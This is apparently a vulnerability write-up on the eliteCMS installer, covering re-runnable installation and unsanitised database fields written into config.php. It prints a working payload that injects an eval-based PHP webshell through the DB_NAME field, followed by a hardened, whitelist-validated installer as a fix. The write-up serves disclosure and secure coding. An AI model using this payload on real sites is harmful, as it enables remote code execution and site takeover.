The eliteCMS installer is not locked after installation completes, so an attacker can re-run the installation simply by requesting the installer's URL.

A second vulnerability: the installer can write a one-line webshell backdoor straight into admin/includes/config.php.

Let's look at the code:

// ...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    // ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated unescaped into double-quoted PHP source.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";
    // The generated source is then written to config.php.
    $writer = fopen($file, 'w');
    // ...
Now look at where those session values come from:

// Copied straight from the POST request, with no validation at all.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are accepted without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the double-quoted define() line is broken out of, and a one-line backdoor is written into /admin/includes/config.php.
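A hardened version of the same step 4, added here as an example (not eliteCMS's own code): it refuses to run once an install lock exists, validates each POSTed value against a whitelist before it reaches config.php, and emits the values as escaped PHP literals via var_export so a payload like the one above stays inert string data. The lock-file path and the reading of the values directly from $_POST (rather than via the session) are assumptions.

```php
<?php
// Added example, not eliteCMS code: hardened installer step 4.
// Assumes the original config path and POST field names; the lock file path is assumed.

$file = __DIR__ . '/../admin/includes/config.php';
$lock = __DIR__ . '/install.lock';

// 1. Refuse to run again once installation has completed (fixes the re-install issue).
if (file_exists($lock)) {
    http_response_code(403);
    exit('Installer is locked. Delete install.lock to reinstall.');
}

// 2. Validate every value against a strict whitelist before it reaches the config file.
function installer_value(string $key, string $pattern): string
{
    $value = $_POST[$key] ?? '';
    // $_POST entries can be arrays (DB_NAME[]=x), so check the type as well as the pattern.
    if (!is_string($value) || !preg_match($pattern, $value)) {
        http_response_code(400);
        exit("Invalid value for $key");
    }
    return $value;
}

$db = [
    'DB_SERVER' => installer_value('DB_SERVER', '/^[A-Za-z0-9._-]{1,253}(:[0-9]{1,5})?$/'),
    'DB_NAME'   => installer_value('DB_NAME',   '/^[A-Za-z0-9_$]{1,64}$/'),
    'DB_USER'   => installer_value('DB_USER',   '/^[A-Za-z0-9_.-]{1,32}$/'),
    // A password may contain any printable character; var_export below escapes it.
    'DB_PASS'   => installer_value('DB_PASS',   '/^[[:print:]]{0,128}$/'),
];

// 3. Emit each value as an escaped single-quoted PHP literal instead of interpolating it
//    into double-quoted source: a value such as "?><?php ... cannot close the string.
$write = "<?php\n";
foreach ($db as $name => $value) {
    $write .= sprintf("define('%s', %s);\n", $name, var_export($value, true));
}
// No closing ?> tag, so nothing after the config can leak into the response.

// 4. Write the file and create the lock so step 4 cannot be replayed.
if (file_put_contents($file, $write, LOCK_EX) === false) {
    exit('Could not write config file');
}
touch($lock);
```

With the original payload as DB_NAME the request is rejected by the whitelist; even a value that passed a looser pattern would land inside the quotes of a var_export literal rather than as executable code.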